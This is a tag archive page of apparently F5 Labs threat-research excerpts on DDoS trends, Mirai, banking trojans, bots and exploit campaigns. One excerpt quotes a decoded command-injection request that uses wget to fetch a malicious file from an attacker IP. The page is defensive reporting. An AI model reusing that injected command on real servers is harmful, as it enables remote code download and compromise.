Tag: Cybercrime
F5 Labs continually tracks DDoS trends based on data from various sources. Among the most important are the F5 Security Operations Center (SOC), the front line for mitigating DDoS attacks on behalf of F5 Silverline customers, and F5’s Security Incident Response Team (SIRT), which assists F5 customers who are under attack. This article is a…
Read MoreThe number of Mirai scanner systems across the world decreased slightly from December 2017 to June 2018. There is less concentration of scanner systems in North America, South America, and Asia in June 2018 versus December 2017. Europe is the only region where Mirai scanner infections remained relatively the same from December 2017 to June…
Read MoreWhile investigating a recent threat campaign, F5 researchers encountered a strange behaviour where malicious requests were originating from legitimate Googlebot servers. This relatively infrequent behavior could potentially have serious consequences in environments where the trust level given to Googlebot influences an organization’s security decisions. The Trust Paradox Google’s official support site advises to “make sure…
Read MoreData from the Retail Cyber Intelligence Sharing Center (R-CISC) echoes the F5 SOC findings and shows that dramatic increases in shopping activity actually continue into January, making retailers a likely target of attackers.1 In a 2018 survey of R-CISC members, respondents expressed their concern, identifying phishing, credential compromise, and account takeover (ATO) among their top…
Read MoreFirst detected in May 2018, DanaBot is a fraud trojan that has since shifted its targets from banks in Australia to banks in Europe, as well as global email providers such as Google, Microsoft and Yahoo for the holiday phishing season. Source link lol
Read MoreKey Points Only a few days after the ThinkPHP vulnerability was discovered, it is already being exploited on the Internet. Almost 46,000 servers, most of which are located in China, are potential targets for this exploit. Multiple campaigns have been launched simultaneously by different threat actors, which might suggest the infection potential. Campaigns vary from…
Read MoreGozi “banking” trojan continues to shift its targets beyond banking as it employs client-side and server-side evasion techniques via time-tested web injection. Source link lol
Read MoreIt’s hard to get through any news cycle today without bots coming up. Those we hear about most spread spam, propagate fake news, or create fake profiles and content on social media sites—often to influence public opinion, spark social unrest, or tamper with elections. During the 2016 US presidential election debates, bots were used on…
Read MoreAfter the vulnerable server decodes the string, it is instructed to download a malicious file. The malicious request after decoding is: oProxyCommand= wget http://185.29.8.28/down.php&port=143&user=sdf&passwd=sadf&server_type=imap&f_submit=Submit. Again, in this case the threat actor took down the malicious file download.php before the researchers could download it to analyze. Weathermap Editor (cacti plugin) Arbitrary Code Execution (CVE-2013-3739) Another known…
Read MoreConclusion Continuing the trend from January, threat actors in February delivered crypto-miners and Mirai variants. Most of the vulnerabilities exploited in February are not new, however, they are known vulnerabilities in popular applications and systems. In these cases, a threat actor is not looking for a specific target, but instead tries to exploit as many…
Read More